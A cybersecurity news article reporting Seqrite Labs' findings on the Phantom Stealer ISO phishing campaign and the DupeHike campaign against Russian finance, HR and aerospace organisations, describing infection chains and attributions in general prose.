Cybersecurity researchers have revealed an active phishing operation targeting multiple sectors across Russia, with a strong focus on finance and accounting organizations. The campaign distributes Phantom Stealer through malicious ISO optical disc images attached to phishing emails.
The activity, tracked as Operation MoneyMount ISO, was uncovered by analysts at Seqrite Labs. While finance and accounting departments are the primary targets, procurement, legal, and payroll teams have also been affected.
Multi Stage Infection Chain Using ISO Attachments
The campaign begins with phishing emails that impersonate legitimate financial communications. Victims are urged to verify or confirm a recent bank transfer. Attached to the email is a ZIP archive that supposedly contains transaction details.
Inside the archive is an ISO file named “Подтверждение банковского перевода.iso” or “Bank transfer confirmation.iso.” When opened, the ISO mounts as a virtual CD drive and executes a malicious payload by loading an embedded DLL file called “CreativeAI.dll.”
This technique allows Phantom Stealer to be launched without dropping a traditional executable file, helping the malware evade detection by security tools.
Phantom Stealer Capabilities
Once active, Phantom Stealer harvests sensitive information from both browser based and desktop cryptocurrency wallets, particularly those associated with Chromium based browsers. It is also capable of stealing browser passwords, cookies, saved credit card details, Discord authentication tokens, and local files.
In addition, the malware monitors clipboard activity, logs keystrokes, and performs checks to detect virtual machines, sandboxes, or analysis environments. If such conditions are identified, execution is terminated to avoid exposure.
Stolen data is exfiltrated using Telegram bots or attacker controlled Discord webhooks. The stealer also supports file uploads to remote FTP servers, enabling large scale data theft.
DupeHike Campaign Deploys DUPERUNNER and AdaptixC2
Separately, Russian organizations, particularly human resources and payroll departments, have been targeted by another phishing campaign known as DupeHike. This activity has been attributed to a threat cluster tracked as UNG0902.
According to Seqrite, the campaign uses ZIP attachments containing decoy PDF and LNK files. These files ultimately lead to the deployment of a previously undocumented implant named DUPERUNNER, which loads AdaptixC2, an open source command and control framework.
The LNK file, disguised as a document related to annual bonuses, downloads DUPERUNNER using powershell.exe. The implant then displays a decoy PDF to distract the victim while injecting the AdaptixC2 beacon into legitimate Windows processes such as explorer.exe, notepad.exe, or msedge.exe.
Broader Phishing Activity Against Russian Organizations
Other phishing campaigns have also targeted finance, legal, and aerospace sectors in Russia, distributing frameworks such as Cobalt Strike and malware families including Formbook, DarkWatchman, and PhantomRemote. These tools enable data theft as well as interactive hands on keyboard access.
In several cases, attackers abused the email infrastructure of already compromised Russian companies to send spear phishing messages, increasing trust and delivery success.
French cybersecurity firm Intrinsec has linked attacks against the Russian aerospace industry to hacktivist groups aligned with Ukrainian interests. The activity, observed between June and September 2025, overlaps with intrusion sets tracked as Hive0117, Operation CargoTalon, and Rainbow Hyena, also known as Fairy Trickster, Head Mare, and PhantomCore.
Some campaigns redirected victims to credential harvesting pages hosted on IPFS and Vercel, targeting Microsoft Outlook accounts and services linked to Bureau 1440, a Russian aerospace organization.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
